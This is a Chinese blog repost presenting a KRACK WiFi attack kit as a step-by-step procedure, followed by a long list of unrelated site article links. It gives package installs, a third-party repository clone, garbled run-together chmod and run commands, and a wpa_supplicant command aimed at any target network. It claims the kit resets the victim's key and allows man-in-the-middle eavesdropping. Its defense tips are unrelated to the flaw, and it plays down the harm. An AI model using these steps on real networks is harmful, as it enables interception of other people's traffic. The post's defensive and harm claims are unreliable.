国内研究人员首次Wifi重大漏洞利用实现 | Krack攻击测试套件打包
时间:2022-04-28
本文章向大家介绍国内研究人员首次Wifi重大漏洞利用实现 | Krack攻击测试套件打包,主要内容包括防御方法、危害性、基本概念、基础应用、原理机制和需要注意的事项等,并结合实例形式分析了其使用技巧,希望通过本文能帮助到大家理解应用这部分内容。
弹出连接提示弹窗后,输入任意密码位数均可,尝试连接,目标wifi会被攻击,创造握手,目标wifi密钥会被重置成你设定的密钥,在iphone上可以看到有人不断连接和断开,这时候就是连接成功,可以开始监听,利用中间人技术,这里以iphone手机做测试。Krack曝出来很久了,所以在11.3号写下这篇文章,思来想去就发表在freebuf这吧。
从事件开始到现在也一直没有攻击的套件和利用文章,按步骤操作,过程很简单,研究人员都可以看懂,不提倡恶意攻击者使用,所以就不写傻瓜tou式教程lan,在绝大用户都没更新的时候,还是希望这篇文章只是作为研究使用(漏洞没有那么大的伤害性)
打开终端:
apt-get update
apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
下载文件:
git clone https://github.com/NoahhhRyan/krackattacks-testcd krackattacks-test-research cd krackattackschmod 777 krack-ft-test.pychmod 777 disable-hwcrypto.sh./disable-hwcrypto.shpython krack-ft-test.py
设置network.conf文件,在目录里需要将里面的”testnet”改成你要攻击的wifi名,密码随意,保存在套件目录下:
最后执行如下命令,并尝试连接目标开始攻击,等待结果。
sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
然后也可以对任意wifi进行攻击,在wifi列表点击连接即可,在苹果手机上的热点栏能看到攻击者不断连接和断开,这里我们再测试了一个wifi,效果同样可以。
防御方法
总结一下,提供一个暂时的解决办法,更改路由器默认用户名,密码和SSID,打开防火墙,关闭SSID广播,为自己的用户设置单独的SSID,完全关闭DHCP。
危害性
其实不用那么担心,咱们大天朝wifi万能钥匙都存在多少年了,比它牛逼多了,也没见你们害怕啊。。
Thanks for all.
Weibo@NoahhhRyan.
- hdu----(5056)Boring count(贪心)
- hdu----(5055)Bob and math problem(贪心)
- hadoop3.0 Yarn支持网络资源:network原理设计文档说明【中文】
- PHP-超级全局变量
- 日志分析实战之清洗日志小实例5:实现获取不能访问url
- CentOS安装Redis、PHPredis扩展
- 日志分析实战之清洗日志小实例4:统计网站相关信息
- PHP-数组排序
- hdu---(3555)Bomb(数位dp(入门))
- PHP-循环
- 日志分析实战之清洗日志小实例3:如何在spark shell中导入自定义包
- PHP-函数
- hdu----(5045)Contest(数位dp)
- hdu----(5053)the Sum of Cube(签到题,水体)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 施工专题第11篇:Python 包和模块使用总结
- Node.js-具有示例API的基于角色的授权教程
- 删库时,我后悔没早学会的数据库知识
- SwiftUI:使自定义类型符合 Comparable 协议
- 【CCF】线性分类器
- 计数二进制子串
- 6个实例详解如何把if-else代码重构成高质量代码
- leetcode201场周赛
- ASP.NET MVC+LayUI视频上传
- Linux执行tar解压报错tar: Error is not recoverable: exiting now
- elasticSearch学习(四)
- 在美帝的服务器的prefetch和aspera下载比较
- 全面介绍eBPF-概念
- 在ubuntu20上面安装R4
- 冷饭新炒:理解Snowflake算法的实现原理